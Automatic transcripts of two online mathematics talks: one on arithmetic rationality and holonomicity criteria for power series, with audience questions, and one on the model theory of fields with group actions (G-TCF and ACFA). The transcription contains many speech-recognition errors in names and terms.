columnistic theorem this will be the key point however in the analogous setting that I will turn to. And this is used I think I sketched how this should imply a lower bound on the orbit goals for iterations of our fine space. 
Because the iteration has a model as well as the lambda over the a-syntegers for a finite set of places as the full height history is just controlled by by just the fine veil height of the individual coordinates. The whole orbit is S integral we have the prime number theorem that tells us exactly how much mod piationality we have. You see the dimension occurring here because of as one over the index exponent. Because I know the reduction mod V is a rational function bounded of degree bounded by that. So this is ultimately how how it enters. And finally we get the following the rationality criterion does much better essentially improves the previous the trivial counting bound by north code than exponential. It turns out it follows that either our orbit recorded by the coordinate lambda I mean by the observable by the function lambda is either so this either piecewise and a polynomial is wise in that the large enough n partitioning to finitely many arithmetic progressions and on each of them these coordinates is a polynomial in n or else we have this where now notice that my the height function was logarithmic and I've taken the log of the logarithmic height on and also I have included the individual lambda here that is still not trivial from the north code bounded for the full orbit growth. So this is the exponential improvement in particular and all right I think I repeated the last display and also I'll just mention that one can use a specialization argument to the global field to also get an implication from this arithmetic statement this arithmetic method to a purely algebraic statement about the growth of degrees but in restricted situation again we move and then lambda is just a polynomial map then we know that the sequence of these degrees again I think what makes it non-trivial is that I have first taken lambda and then composed with the nth iterate is either eventually periodic or unbounded and if it's unbounded there is some explicit but horrible lower bound on the growth. 
So before I turn to the holonomicity versions of such criteria I will I want to point out some related work by different methods that there is the theorem of Ulle that contains exactly this kind of bound on the degree but for the full for the full degree there is no lambda involved and it is I think more general that it applies not only to morphisms of affine space but any at the morphism of an affine variety and also even for the lemins of the height there is this work of Kantat and Xie giving divergence of lemins if the sequence of degrees is not eventually periodic and in the setting of rational meromorphic algebraic dynamics where we have any dominant rational self-map of a quasi-projective variety then again we have the same observation starting from Northcott on the limb soup of this kind of growth but this is for the full height and it does not include the lambda the orbit is not sampled on the fixed function you cannot look at just one coordinate and I would like to point out that it seems this same bound if you put lambda of fn of p should be also fulfilled in the following with exactly this gap of one over the dimension of x just as soon as the orbit is not piecewise polynomial in n and sorry and that is I apologize that this is how it should read this not quite right I should have the orbit to be not piecewise polynomial or arithmetic progressions and however there is recent work that I'll indicate on the next slide that does show the positivity of this incomplete generality and these are the references the I think please correct me if I get it wrong but I think there is no so there is some explicit bound but it's worse than one over the dimension of the variety I think this should be expected and there was the paper by Belkioka and Satyano in the case where f is an endomorphism by a periodic analytic method as opposed to this one which is spot p but where p varies I think in full generality and even more recent paper oh I apologize I do not okay I think on the slides I sent you there I have updated the publication the full reference for this paper which is in the case of a rational self map now I turn to two more general criteria and I will introduce the height a bit of notation that I already mentioned this is for any go over any global field and there is also another standard notion that I will call the tau tau of f is a what remains of the height after you take account of all the convergence radii so that means that the full height will decompose into an analytic piece so to speak which will involve which will be just the log plus of one over the convergence radius of the power series and so this would be the case if the coefficients were as in to go for a set of places but in general think of the think of the logarithm series for example the convergence radii are all one and the height is one by the prime number theorem so in general there remains another part that is the true denominators part true arithmetic part if you if you that makes sense of the height so technically it's defined by this formula that you first take a finite set of places then you consider the same growth rate of the height but after it's depleted you remove the contributions from the finite set of places and finally you see how small can you make that if by increasing the finite set of places so the the moral of this is that tau is zero if the coefficients are a syntagere for a finite set of places and the condition tau equal to zero should be read as a slightly weaker quantitative version of a 
syntagere coefficient. Assyntagere coefficients appear in the most celebrated classical rationality criterion the one of Emil Borrell that work revised in his work on the congruent zeta function he used it to give the to prove the rationality of the zeta function of any variety over a finite field and we will include this so the first result on this will be refinement of the theorem of Borrell and work that also will be the sharp strength strengthening of theorem from Andres book g functions and geometry the broad work criterion will be the case but tau is equal to zero essentially a syntagere coefficients and the improvement will be essentially by completely deleting the parameter kappa that was artificial and we saw earlier but in this in this context I will I will not include mod p conditions at all I'll just just limit the discussion to the attic the attic analytic conditions so as in the broad work criterion the vatic conditions are that well we consider the largest radius of meromorphia of the formal power series f we can do this for every place v of the global field and that means that we can express f of x as a quotient of two convergent power series on the vatic disc of given radius rv so I guess I should write sorry I should write mv of f or mv is the largest radius and then the criterion for this the first new theorem on this on the subject but it is a sharp rationality criterion it states that the f is rational just as soon as this whole that the sum of all the logarithms of all the meromorphic adi is greater than this tau invariant that I introduced so when the tau when the coefficients were a-symmetric the right hand side is zero and that's just the familiar condition of braille and vortice you have meromorphic on disks or poly disks whose product of radii strictly exceeds one but so what improves so this this will be just a small improvement after all I will use Andrei's own method but show how a multivariable use of his methods allows to bypass an artificial constant that he had so his theorem proved had a weaker condition certain absolute constant times the tau invariant and this is sharp because conversely now for any collection of such radii of real numbers there is a continuum not just uncountably many but in fact the cardinality is the continuum of a formal power series that are even convergent on those disks and where this this turns out on equality so as soon as we have a strict inequality we have a countably many and in fact all of them are just rational functions this is a complete characterization of rational functions for the so sorry thank you for the question so in I should say yes I I want to consider the radius of meromorph so the lag is the rv is what what we defined the mv of f and the remainder now I turn to holomicity and the results that follow are joint promote work in progress with Frank Kalegai and Yunqing Tang all possible errors in these examples I hope everything is fine but everything that that is not fine is entirely my own responsibility we have also filtered invariants that so I defined the invariant tau of f but for any every integer we can consider a sequence of decreasing numbers by just looking at the string of not not the entire initial string of coefficients of the power series but all coefficients in degrees between these two two multiples of n and then we will have an improvement of the criterion that that is sometimes useful here are some examples the polylogarithmic series have a tau invariant equal to k but indeed this sequence of 
filtered invariants is strictly decreasing to zero the tau r of the kth polylogarithmic series is just the asymptotic density of the primes up to n that divide some number in the range that we use that range comes up in in the Zigo lemma proof in a similar similar way to the profile sketch of the first criterion and however this modification will have tau equal to k for all k and r so the sequence will not decrease so we we work in a more general setting that this follows andres approach that we can call simultaneous simultaneous neomorphic uniformization we don't instead of asking for f of x to be neomorphic on a disk of a given radius we will ask for both x of z and f of x of z to be to be neomorphic on on a disk in the z plane and I will use notation for the polydisk of radius rv in this sense that the it is an equalized polydisk we take the same radius for all the coordinates and the obvious extension of my notation with these invariants in the multivagant setting using the total dp and as we look at the growth rate of the vector of coefficients of tot of a bounded total dp I apologize I should follow the chart okay there is nothing new and here is the setting that we all the remaining criteria are placed we look at the radius for each place of v and a holomorphic mapping that's just a convergent power series for every place into the into cv to the d it's from the d dimensional polydisk with this normalization that is all I ask of the map this is like a substitution but it should be normalized to have a unit derivative at the origin otherwise it has just transcendental coefficients and also we ask that it should be this is very important for for the criterion it should be trivial for all but finally many v x v of z is just the identity for all but finally many v I will call this an adelic template because I will be interested to to fill the solutions of this template and by that I mean the solutions will be the formal power series in the variables with this property that when you do the substitution f of x of z at every place and then look at the z plane or in the dimensional polydisk then we get a germ of a meromorph function on that polydisk but I also again stress that I allow this f of x of z to be meromorphic in z but I insist and that is will be a crucial restriction because Andres method is more general I insist x of z to be holomorphic in z and then the basic problem will be to to describe all the solutions of this for given data this is the starting datum and then to find all the formal power series with these properties subject to denominator constraint for example on the invagans tau of f of the more precise denominator information for f in this language the rationality theorem is expressed like like this if we take let's this limit to dimension one here so and then we take x of z to be z of every place with some radius rv and then all the formal solutions of this inequality time variance more than the sum of the logs of all the radii precisely the rational power series we complement this by dropping this restriction that the substitutions are all the identity and now we are we can make any substitution which is holomorphic such that f of x of z is meromorphic on at every place v and now if this and then we also relax the condition a bit to the sum of the logs of all the radii the total arithmetic degree that we have to be strictly larger than the tau infinity filtered invariant so this is the limit of all the tau r if this is confusing then just put tau of f here that would 
be a special case and so the simplest version of the theorem states that such formal power series are necessarily defined power series they are holonomic functions and they are solutions of linear differential equations over the function field k of x I state a special case of the main delfantin criterion in Andrei's book with a mild invariant to the filter invariant that I point out and in our notation I must stress it is very important to additionally assume the set of places in the criterion must be finite otherwise actually the proof breaks down and it treats this way suppose we have these substitutions additionally I will have a second bit of notation to denote the maximum sv of the absolute value of x on the disc on the polydisk so we suppose we have holomorphic mappings that send the polydisk radius rv to the polydisk radius sv of course s must be at least r just by Schwarz's lemma and if x equals z then we have the equality and then Andrei's delfantin criterion gives linear relationship over the function field it states that if there is a parameter kappa that arises similarly in serial lemma the slides actually the extended slides indicate the full proof of this criterion taken from Andrei's book but I will just indicate the choices of the parameters involved if this holds for some kappa then the template problem simultaneous uniformization problem has at most n minus 1 independent solutions over the function field again it is a similar kind of inequality if you like it's also possible to include mod p conditions reducing also the power series that some of the primes like we had in the first criterion the parameter sorry yes I missed what this tau k when you have m functions for the tau oh yes it is defined just by taking the totality of all the coefficients of the entire vector of the mod x to the n truncations for all the power series that's a point in some huge projective space and then we take the height so defined in the same way and I just want to convey the intuition for the parameters involved this is how Andrei's in a condition looks like we will be interested to remove the dependence in kappa that is completely obstructs applications but the essential condition really is this the absolute potential positivity condition without it we have just uncountably many formal solutions with it we have very easily just countably many formal solutions and we would like to see some structure about them the proof is by transcendence methods we just like before we use Ziko's lemma to construct an auxiliary linear form in the functions where the qi will be polynomials and the combination we just want to give an approximate linear relation the combination will vanish highly at the origin and the polynomials will have heights bounded proportionally to kappa times h kappa will be the deflex exponent in the Ziko lemma and the height of I mean the height of the vector of formal functions fi and then of course there will be a parameter of a parameter that will go to infinity I mean the proportionality parameter the degrees of the polynomials will be bounded by this proportional to this and that is where this term will come from from the parameter count but we can't really get rid of that kappa it comes there is an optimal choice that it's a mess that to equalize the two terms with kappa and finally this term will come from estimating the polynomials on on the polydisk so we need a growth information both on the x of z as well as on the functions f of x and then I have essentially the full 
indications of the proof on the on the next few slides I think I should just leave okay just just display Ziko's lemma the the full statement works like this we have a parameter count we have to solve that many linear equations in that many coefficients and as soon as n exceeds the number of equations we will have a solution then we make an additional make this choice to to get a bound on the height and this is where kappa will come from but and the rest will be actually that is taken from Andres book so let me from now but move to the move on to the proofs of the new parts the rationality criterion is a multivariate application of Andres criterion again here we take the basic case where x of z is trivial we introduce the auxiliary new variables like in Roth's method and that will improve the parameter count in Ziko's lemma so I will denote the block of variables by by this x and out of the original univariate power series we build a bunch actually quite a few of them super exponentially many of them of new power series the crucial point is to take the split variable disjoint disjoint variable product of f evaluated on products of pairs of polynomials so I arrange this ranges over subset of pairwise disjoint pairs ij of indices their number is clearly exponential in this square and the crucial point is that is super exponential in d because we if we take all right if we take tau of a power of f it just in just one variable this increases and can get as large as the original tau plus term like like this but unless tau is equal to zero but for disjoint variables we always have this if you take a new power series a power series in x1 multiplied by power series in x2 and so forth the tau never increases so additionally when we do change f of x to f of x times y the height as well as the radii will scale by the same factor completely proportionally by factor of one half so we have this as well and then andre's condition becomes the following and we can now firstly take kappa to zero that will kill this term and then we will take d to infinity and it will because m was super exponentially large in d and will also kill this term and what survives is just the essential condition that we have proved already supplies rationality but this was in the case where all the substitutions were just trivial x of z equal to z the proof also immediately shows the first part the qualitative part of the holonomistic theorem actually that already follows from andre's criterion because we can take enough sufficiently many derivatives in andre's criterion that never changes the invariant style or the height of the power series and we can just kill the the additional terms we can take kappa to zero and then sufficiently many derivatives will make the third term in andre's criterion also go to zero however we have the following quantitative estimate on the order of the differential equation this is how it reads not only are the solutions of our problem the formal power series f satisfying these substitutions on the relativistic conditions not only are they holonomic but also but in fact they satisfy a linear differential equation I take the inhomogeneous form there exists a differential operator l of order r minus 1 such that l applied to f is just a polynomial where and the bound on r can be taken it is explicitly in terms of all the invariants that we have as soon as r satisfies this inequality then then the rank of holonomicity will be bounded by will be in fact smaller than r and a variant will be if we restrict 
the denominator types more precisely let's consider rational coefficients for the power series and suppose we have a real number s and an integer t such that all the coefficients when multiplied by the least common multiple of the integers up to sn and then raised to the t power are as integral where the finite set of places can can be allowed to depend on f we do not fix it in advance so this is the situation where tau is bounded by s times t but we have a specific behavior for the denominators then the version of the criterion states that the same condition entails a finite dimension okay a dimension bound by this quantity on the linear span of all the solutions so they just range from not only they are holonomic but the totality of them has a finite dimensional span there are just essentially finitely many operate differential equations involved the proof is works similarly by additional variables where we replace the original variety that was the affine line by the dth power and we will take the asymptotic the number of variables to vote infinity this time we cannot use a super exponential number of new power series because that no longer applies if x of z is not the trivial substitution this will no longer be analytic on the radius of square root of r the best we can do is to just take the disjoint variable products just of the power series and their derivatives and that way we can generate exponentially many exponentially many auxiliary solutions in d variables out of the original univariate polynomial the key input is that when we take disjoint like split variables product like this f of x times g of y and the variables are disjoint these two invariants the height and tau will not increase and the the proof then works very similarly suppose for contradiction we have these derivatives are linearly independent over the function field k of x and then for some are satisfying um andre's condition then we will consider the r to the d new power series out of the original ones by just taking derivatives that does not change and does not change the infargence and multiplying in split in disjoint variable products and then and then this choice of the substitution just calling just the Cartesian power of the univariate one in this procedure the term from the ego's lemma the kappa will disappear if we let d to infinity and then uh the resulting inequality is exactly the contradiction is exactly the opposite that is I will uh I wanted to stress that the proof involves uh crucially the holomorphi of x and z we can uh andre's criterion is nonetheless more general it applies to uh meromorphic substitutions as well so this improvement is not always possible to just remove the parameter kappa incomplete generality there was a not obviously related paper by Zudelin in a journal basically in a different field apparently constructive approximation theory a couple of years ago and the title of the paper is a determinant approach to irrationality where he essentially gave rationality criterion in of the of a similar kind and this is a particular case of our setting his criterion looks like this uh we have a formal power series with rational coefficients uh we suppose it is um analytic say holomorphic on a slit plane c minus this branch curve from minus infinity to minus r but because of the Riemann map uh for for that simply connected domain that is explicit here that condition is exactly equivalent to convergence when you make this substitution so that that places his uh this in our setting uh and also 
to uh suppose f has unit uh piadika radii i mean convergent on the piadic unit disc for all points p and finally that the total arithmetic degree the sum of logs of all those radii is bigger than three halves times the tau invariant then Zudelin proves that uh f is a rational function um and there are examples like the logarithm series for example log of one plus x uh is um uh not rational it has to be holonomic because because of the holonomist the theorem uh because um uh and because tau of the power series f is equal to one and that is smaller than log four uh and uh this shows that uh there must we cannot have an algebraic uh conclusion in general we we can uh uh at best have holonomicity uh and it remains an open problem to find the best constant in Zudelin's criterion it is somewhere between 1.5 and log four um there is another uh case uh where uh we can solve the uh problem precisely and that will be similar criterion to Zudelin's um to this to precisely describe uh which holonomic functions arise in in a special case of of this setting uh let me directly just take uh point out uh this case take the prime two and uh this hypergeometric function that it just reduces to essentially the arc sine function uh that has um a two-adic radius uh as as high as four um this this combination although the arc sine uh although um if we uh so this is equivalent to taking this function uh and this is a holonomic function it satisfies uh linear differential equation of order one in homogeneous uh and with singularities only at zero one and infinity the two individual factors this and this have two-adic radii as small as a quarter their product has a two-adic radius as high as four sixteen times as big um the Taylor series of the function has denominated has denominator type is we take the least common multiple of the first n denominators it divides this it is essentially this uh and so does this function uh modifying h by the substitution x over x minus one um so we are in a position to fully determine all functions with with these properties so i will just state another case uh where we have a precise characterization of the solution space uh it states like the following we take a power series uh with rational coefficients such that it converges on the two-adic disc of radius four uh and on the p-adic disc of unit radius second uh the if we take the nth coefficient multiplied by the least common multiple of the first two n plus one integers uh we get uh an s integer uh where uh s can depend on the function f and third uh they're up to multiplying the power series by some polynomial non-zero uh there is a linear differential equation l of f equal to zero for some linear differential operator with singularities uh close enough to either zero one or infinity uh which were the singularities for this function then uh any such function is just a rational linear combination with q of x combination of those three we have a three-dimensional space of solutions with the basis uh given given like this uh there are not many cases where we can get an exact characterization and uh i think i should uh all right so my slides also include the proof uh outline of this as well as the application to rationality of the of the two-adic zeta value that i uh did not have time to discuss um so it is what it was with uh such applications in mind that this was uh these criteria are developed um i think uh i i get to the uh i'm out of time at this point so i should um i want to thank everybody for for your attention on the 
wonderful conference okay uh feel free to unmute yourself and and applaud some people are putting little hands in whatever that is yeah that's cool uh are there any questions can you say how your um how your thing results would relate to uh Sonye's results and strength for for ruch's conjecture where um oh the one uh yeah if i go back i think i can do it just just like that on the first slide basically the two slides are exactly of the same strength actually i would say uh if you recall this paper he had um constant like uh e to the i think three minus two root two something like this he proved that if we have um a linear recurrent uh if sorry if we have a sequence of integers uh such that the reduction mod p is uh satisfied a linear recurrence delay equation mod p of uh a length less than p uh and the growth rate uh was smaller than this then uh the sequence satisfies a linear relation so the and if you optimize kappa in this display it gives exactly the same constant i would say this is the same result uh as i stated the one variable proof uh optimizes to Sonye's quantitative result exactly all improvements come from for more variables and similarly in Andrei's book there is a related constant for uh i i stated um his uh sorry um his rationality theorem is stated under the conditions this some of the law talks of mermorphic radii exceed basically the same kind of constant i wrote 12 but in fact he he the optimal constant is i think x of two times that the same three minus two root two something like this times the tau invariant but uh again it is possible to mix the two types of criteria if that is useful i would be very happy to know if there are more applications if they come up useful for other things uh you can add mod p conditions and um uh the attic analytic conditions at the same time can i ask a question sure hi i i'm uh i'm you probably i don't know if this is a bad question or not but i would be interested in actually trying to use this criteria or trying to apply it so it can it be is it practical to try to make it effective you gave an example on a function which was somehow already known and it was hyper geometric but what what kind of format of function do i need to be actually try to make it effective if i actually like i would really love to try to use this yeah so i think you have in mind the the holonomistic criteria with oh yeah the whole yeah sorry sorry i should jump ahead sorry i had it in my head in the about the teaching five minutes so i uh right right no that's a great question that's exactly what we uh we we try to do in some cases there are potential applications where if you can describe completely the solution space we just give um semi semi effective result with some dimension bound but we really have a finite dimensional space and we can't describe it effectively this is somehow uh i apologize for the comparison but i think it's a little similar to to isiga rope where you have a bound on the number of solutions but finding them effective is hard by the method that you need some anchors some extremely good examples like in bombilla effective three methods to start with uh and this was just an example where uh the arc sign example or this hyper geometric case where it was possible yeah because we uh we have an excellent two-adic radius uh in this case and we started with three solutions uh that are real solutions and they they somehow are enough um to to bootstrap to to know solutions you you can find some indications on the slides that are posted on the 
workshop page, but the short answer is: we would very much love to do it in more interesting cases. Okay, thank you. But can you see it, in some sense, as just a very general Pólya-Carlson-type theorem or something like this? You mean, are you referring to the holonomicity twist? Yeah, I mean, you're getting logs, log(1+x) and things like this. Yes. Already Zudilin's work was, I think, the first extension of this kind, because, as we have seen, holonomicity holds even without this coefficient of 1.5, but then we really have holonomic solutions, not rational ones, and we have a criterion for holonomicity up to a given order; that is what is used in the application to transcendence. We don't know the best constant here, in this gap. But I don't know whether we can apply the holonomicity criterion to orbit-growth lower bounds in a similar way. The irrationality criterion gives, for example, a height lower bound on holonomic functions: the height must be positive if the function is not rational of the special form, some polynomial over one minus x to a power, or a product of cyclotomics, something like that. I don't know if the holonomicity criterion has a similarly strong consequence. Are there other questions for Vesselin? If not, let's thank Vesselin again. Now I have to figure out how to stop the recording; there's supposed to be a button; ah, here it is, I was on the wrong page.
I will present in detail a new twist in the subject of arithmetic algebraization theorems. It comes out of a joint work in progress with Frank Calegari and Yunqing Tang on irrational periods, and bears also a relation to a variation by Zudilin around the classical Polya-Bertrandias determinantal criterion for the rationality of a formal function on the projective line. Time permitting, I will sketch an application to an irrationality proof of the 2-adic avatar of $\zeta(5)$.
10.14288/1.0397421 (DOI)
So it is my honor to introduce Piotr Kowalski from the University of Wrocław, who will talk about the model theory of group actions on fields. Thanks a lot, Masha, and thanks to the organizers for inviting me to give a talk here. It's actually my first ever online conference, and I like the talks; they are useful for me, so thanks also for the opportunity to listen to all these good talks. I am a bit nervous for two reasons. First, I have never given a conference talk like this. Second, all the nice talks I heard fitted nicely into the main topic of the conference, and my talk doesn't seem to be like that. In many conferences the main topic is often used as an excuse to talk about things not so much related to it, which doesn't seem to be the case with this conference, but it is the case with my talk. So I'm sorry for the people who will maybe not find it so interesting because of that, but maybe it will still be entertaining. Right, it's moving. On this slide I'm still trying to connect to the topic of the conference, algebraic dynamics. As we saw in several talks, a fine model-theoretic analysis of particular theories, the theory of differential fields and the theory of difference fields, and the trichotomy results there, often have applications to dynamical problems. So I'm saying here that this model-theoretic approach to algebraic dynamics often goes through the analysis of a particular theory, most notably the first-order theory of difference fields, fields with an endomorphism, which is ACFA. And this approach was fruitful, as we noticed at this conference as well: there are dynamical results of Chatzidakis-Hrushovski, Medvedev-Scanlon and others which use this model-theoretic analysis. Now I'm getting closer to my topic. Inversive difference fields, the ones where the endomorphism is invertible, an automorphism, are the same as actions of a particular group, the group Z, on a given field: a choice of automorphism is the same as a choice of an action of the group on one generator. That is where ACFA lives, let's say. In my talk I just replace Z by an arbitrary group and then look at the corresponding model theory: is it nice, does it exist at all, in a way? ACFA is a nice theory of difference fields, a theory of large difference fields; I will make this precise soon. So, for an arbitrary group, the first question is whether this nice theory exists at all, and this will be the main topic here. I will consider three kinds of groups. This is joint work with Özlem Beyarslan in the case of two of these classes of groups, and with Daniel Hoffmann in the case of finite groups, which are of course a special case of each of the others. The list of coauthors is alphabetical and anti-chronological: it was first the work with Daniel, then with Özlem. So now the setup; just some terminology. We have this fixed group G, which will act on fields, and I use the short name G-field for a field together with an action of G by field automorphisms. Just as we have G-sets, we have G-fields: an action of G compatible with the structure of the field. Then we have natural notions.
If we have two G-fields, we can have an equivariant extension; this I will call a G-field extension. There are also natural notions of G-ring, G-ring extension, etc.; everywhere the usual notion, but with a compatible group action. Then we look at a G-field as a first-order structure. What does that mean? A ring is a first-order structure because you specify two or three binary operations and two constants: plus, minus, times, zero, one. I also have the action of G, so I make it a first-order structure by adding one unary function symbol, which I also call g, for each element g of G acting on my K, like a vector space, which is a first-order structure because we have a function for each scalar multiplication. This may be slightly confusing: this little g formally represents three things at the same time, an element of the group, a function (this is how the group acts), and a formal function symbol, which in a given G-field is interpreted as this function. And of course, if G is, for example, Z, it is not very smart to look at all elements of Z; that would correspond to looking at some automorphism sigma and also adding all its powers to the language, so of course we don't do that. It is often convenient to consider a language where only a useful set of generators is specified. For example, for difference fields we just look at one automorphism sigma, and we may think of sigma as a chosen generator of the infinite cyclic group Z. In practice we usually don't look at all the elements of the group, just at some convenient set of generators. So this is how we look at actions of a fixed group on fields in a first-order way. Then, since I said ACFA is a nice theory of large difference fields, I want to say what it means to be large in general. It is actually a very general definition, valid in any theory, but in the case of G-fields it amounts to saying that all solvable difference polynomial equations have solutions. First, what is a difference G-polynomial equation? I take a system (let's say n is always the same, not to have too many indices; it makes no difference): a finite number of elements of this group G acting on K, a finite number of polynomials over K, and some finite number of variables, and I plug the results of the action of G on the variables into these polynomials. In this way I get a system of difference equations related to this action of the group G. These are my difference G-polynomial equations, which in a large G-field should always have solutions. What does that mean? Of course, there are some equations which are obviously contradictory, and what "solvable" should mean is actually the biggest issue here. The formal name of "large" here is existentially closed, abbreviated EC. "Existentially" means that the formula I'm looking at is "there exists x such that phi(x)", where phi has no quantifiers. So K is existentially closed if any such system of difference polynomial equations which is solvable already has a solution in K. And what does solvable mean? Most naturally, that it can be solved in some G-field extension. So it's a test definition.
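A minimal formalization of the definition just given, in my own notation; the talk states it informally.

```latex
% (K,(g)_{g\in G}) is an existentially closed G-field if: every finite system
\[
  P_i\bigl(g_1(\bar x),\dots,g_m(\bar x)\bigr)=0,
  \qquad i=1,\dots,k,\qquad P_i\in K[\bar y],\quad g_1,\dots,g_m\in G,
\]
% which has a solution in SOME G-field extension L \supseteq K
% already has a solution \bar a \in K^{n}.
```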
I think everything here is very natural: such an equation is solvable if it can be solved somewhere more abstract, and the field is large if it is existentially closed, that is, if whatever can be solved upstairs can already be solved in the field. So these are my large G-fields; that's the definition. Now several comments about them. Do they exist? Yes; it's a very general thing, the same as, even easier than, constructing the algebraic closure of a field: you keep adjoining solutions. If there is a solvable difference equation, it has a solution somewhere, so you add this solution in a bigger field, and the only possible problem is at the limits, at the unions of these extensions. For that one has to know that the union of G-fields is a G-field, which is obviously true. So it is a general property of inductive theories (inductive means that a union of models is a model) that, in this case, any G-field has a large, existentially closed G-field extension. They definitely exist; the question is what they are. If the action is trivial, then we just have fields, the equations are just polynomial equations, and it is exactly Hilbert's Nullstellensatz, or its weak version, telling you that the class of existentially closed fields is exactly the class of algebraically closed fields. That's the description, as it should be. In the case of difference fields, the action of Z, we're back to the original theory: the class of existentially closed Z-fields coincides with the now quite classical transformally closed, or difference closed, fields, models of this nice theory ACFA, about which we have many results, with applications to dynamics. Now something to be careful about. It happens that any model of ACFA, as a pure field, is algebraically closed. However, this is rather unusual; for most other groups it is not true. There is actually a criterion, which I can tell you later if somebody asks. So usually, for other groups, an existentially closed G-field is not algebraically closed as a field, which should not be very surprising, by the Artin-Schreier theorem: a finite group with more than two elements cannot act faithfully on an algebraically closed field. So you don't even have reasonable G-fields at all when the base field is algebraically closed, and it should not be surprising that the existentially closed models are usually not algebraically closed fields. It is good to have this in mind. Then one can ask: but we have this one example, the complex field with complex conjugation; complex conjugation is of course an involutive automorphism, of order two, so this pair is the same as an action of C2 (by Cn I mean the cyclic group of order n; let me adopt this notation). Well, the complex field with complex conjugation is actually also not an existentially closed C2-field, and I can say why. I have to find a solvable difference C2-polynomial equation which has no solution in C with conjugation. The equation says that the squared absolute value is minus one: the squared absolute value of z is z times sigma of z, so this is a difference equation. Obviously you cannot solve it, it cannot be minus one in C, but it is rather easy to find a C2-extension, a field of rational functions, where it can be solved.
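The C2 example spelled out; the particular extension below is my own choice of witness, not necessarily the one on the speaker's slide.

```latex
% In (\mathbb{C},\ \sigma=\text{complex conjugation}):\quad z\,\sigma(z)=z\bar z=|z|^{2}\ge 0,
% so the difference equation below has no solution in \mathbb{C}:
\[
  z\,\sigma(z) = -1 .
\]
% In the C_2-field extension \mathbb{C}(t) with \sigma(t)=-1/t (and complex conjugation
% on constants), \sigma is still an involution, and z=t is a solution: t\cdot(-1/t)=-1.
```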
So C with complex conjugation is not large as a C2-field. Basically, if you have a non-trivial finite group G, then an existentially closed G-field is never algebraically closed. Looking at the chat, no questions so far; if you have any question, please ask in whatever way you like. So they are not large in the sense of being algebraically closed, but the underlying fields of existentially closed G-fields are still kind of large: they are pseudo-algebraically closed. First, for any G-field we also specify its subfield of invariants, denoted by C, like "constants". This is also often confusing: if G is finitely generated, C is definable, but if not, it is not definable anymore; it is only an infinite intersection, so we call it type-definable. Let me recall that a field is pseudo-algebraically closed, PAC, if any absolutely irreducible variety over it has a rational point. Then, as the last piece of general information about existentially closed G-fields: they are always perfect and PAC, and if it so happens that G is finitely generated, so that the constants become definable, then the constant field C is PAC as well. So this kind of largeness we have; algebraically closed we usually cannot hope for. Now, I still haven't gotten to the theory, to what should be the nice theory of these fields. That is again a special instance of a general definition. If there is a first-order theory, a set of sentences in the language I specified (a sentence means you can use quantifiers, finitely many, conjunction, disjunction, negation, finitely many, and the structure I specified before, to say something), whose models are exactly the existentially closed G-fields, then we call this theory G-TCF, and this is our nice theory to study further. This is an instance of the general construction of a model companion in model theory: if it exists, it is the model companion of the theory of G-fields. Maybe for non-model-theorists, let me go back: one could wonder why the definition here is not already giving me my theory. Let's focus a bit: if we fix this formula here, the system of equations, then we have a mathematical condition saying something about solvability, but it is very much not first-order. We are quantifying over all possible G-field extensions of K, and we are not allowed to say "for all possible G-field extensions" in this language; that is not a first-order formula. So the issue is to find something first-order which specifies which systems are actually solvable, and this is a very non-trivial issue. So, back here; let's see some examples. If the group is trivial, the existentially closed fields are the algebraically closed fields, and the theory is ACF, the theory of algebraically closed fields. If the group is free with one generator, that is Z, we get ACFA; with m generators it also exists and is called ACFA_m. If the group is finite, then there is a little story behind it which I don't have time to tell exactly. We wrote this paper with Daniel Hoffmann, and at the very end of it I was still surprised that nobody had ever picked up this natural topic of looking at finite group actions on fields in a model-theoretic way. And it turned out somebody did, ten years before.
I guess he wrote it as a PhD thesis and then, I think, left mathematics; it only exists as a PhD thesis, and it was brought to our attention by Zoé. So there is a large intersection between the two papers; anyway, that's the story. About the existence of the theory: if G is finite, then G-TCF exists. And now is the moment when you may notice that things are not quite clear. What is the general picture? Hrushovski showed that (Z x Z)-TCF does not exist: if you take the very natural theory of fields with two commuting automorphisms (actions of Z x Z are just two commuting automorphisms), then you cannot axiomatize the large models; you cannot axiomatize the existentially closed difference fields of this kind. That may be slightly surprising, but it is true. So if you think about which groups are good in this sense, when this theory is axiomatizable, it is quite hard to say anything so far: finite ones are good, free ones are good, free abelian ones are not good. The main topic of today is to understand which groups are good in this sense, which ones have an axiomatizable theory of large G-fields. I guess this is the last slide of the introduction. Now I plan to talk about finite group actions, but, a bit confusingly, I'm starting with actions of Z; this is the initial example of geometric axioms. Let me recall the axioms of ACFA. We turn to difference equations and look at them geometrically, via a kind of graph, for any variety over K. By variety I always mean an affine K-variety, reduced, of finite type; the same thing as a prime ideal in the ring of polynomials in finitely many variables over K. If I have such a prime ideal, I can hit it by sigma, so from V I get a new variety sigma(V), which can also be described via a fibre product, and then I have a map between the K-rational points. So any difference equation, any system of difference equations, I can understand as intersecting the graph of such a map with some subvariety of the product. We have to say which pairs of varieties like this give solvable systems of difference equations, and that is exactly what the geometric axioms of ACFA do. Let me experiment and draw something. We have V and sigma(V); here is the graph of sigma on V; here is our W, projecting generically here and here; then there should be a point (a, sigma(a)) in the intersection. Sorry for my imperfect drawing, but I think the picture should be rather clear. The axiom says that for any such W which projects generically onto both coordinates, we have such a point in the graph. Now I want to find analogues of these axioms for other types of groups, not just for Z. What to do with that? I should erase the picture now; it will vanish. So those were the axioms of ACFA; now, what happens for finite groups? Ah, a question; I'm reading it: how does G-TCF behave if the group is replaced by a finite-index subgroup or a larger group? Yes, this will be answered to some extent when I get to virtually free groups. The general answer is that only after analyzing a particular class of groups can one get such conclusions a posteriori.
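Before going on, here is the geometric axiom scheme of ACFA described above, gathered into one display. This is the standard formulation and matches the speaker's description; I suppress any technical refinements not mentioned in the talk.

```latex
% K \models ACFA iff K is algebraically closed, \sigma \in \mathrm{Aut}(K), and:
\[
  \text{for every irreducible affine variety } V \text{ over } K
  \text{ and every irreducible } W\subseteq V\times\sigma(V)
  \text{ projecting dominantly onto } V \text{ and } \sigma(V),
\]
\[
  \text{there exists } a\in V(K) \text{ with } (a,\sigma(a))\in W(K).
\]
```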
